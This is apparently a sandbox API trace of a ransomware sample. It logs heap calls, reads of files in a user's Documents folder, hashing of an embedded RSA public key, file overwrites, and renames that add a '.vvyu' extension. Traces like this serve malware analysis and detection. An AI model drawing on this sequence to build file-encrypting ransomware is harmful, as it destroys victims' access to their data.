(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95848 | out: hHeap=0x620000) returned 1 [0193.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.367] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x11c29, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x11c29, lpOverlapped=0x0) returned 1 [0193.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.368] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x11c2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.368] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.369] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.369] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.369] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.370] CloseHandle (hObject=0x568) returned 1 [0193.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0193.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea0a68 [0193.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.373] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\567c.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\567c.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\567c.pdf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\567c.pdf.vvyu")) returned 1 [0193.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.375] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.377] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e4d6f0, ftCreationTime.dwHighDateTime=0x1d86081, ftLastAccessTime.dwLowDateTime=0x8b79a590, ftLastAccessTime.dwHighDateTime=0x1d87c9b, ftLastWriteTime.dwLowDateTime=0x8b79a590, ftLastWriteTime.dwHighDateTime=0x1d87c9b, nFileSizeHigh=0x0, nFileSizeLow=0xf560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5h1GruRzAZNE.docx", cAlternateFileName="5H1GRU~1.DOC")) returned 1 [0193.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95848 [0193.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95848 | out: hHeap=0x620000) returned 1 [0193.378] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\5h1GruRzAZNE.docx") returned=".docx" [0193.378] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\5h1GruRzAZNE.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\5h1grurzazne.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.380] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=62816) returned 1 [0193.380] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.383] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xf53a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.383] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.385] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.385] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xf560, lpOverlapped=0x0) returned 1 [0193.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.386] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.387] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.387] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.387] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.387] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.387] GetLastError () returned 0x0 [0193.387] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.387] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.388] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.388] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.388] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf560) returned 0x2ea79b0 [0193.388] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95848 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95890 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.389] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93810 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c937f8 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0193.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.392] GetCurrentThreadId () returned 0x66c [0193.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f020 [0193.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.393] GetCurrentThreadId () returned 0x66c [0193.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93810 [0193.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93870 [0193.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93888 [0193.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93828 [0193.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937f8 [0193.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93888 | out: hHeap=0x620000) returned 1 [0193.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0193.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 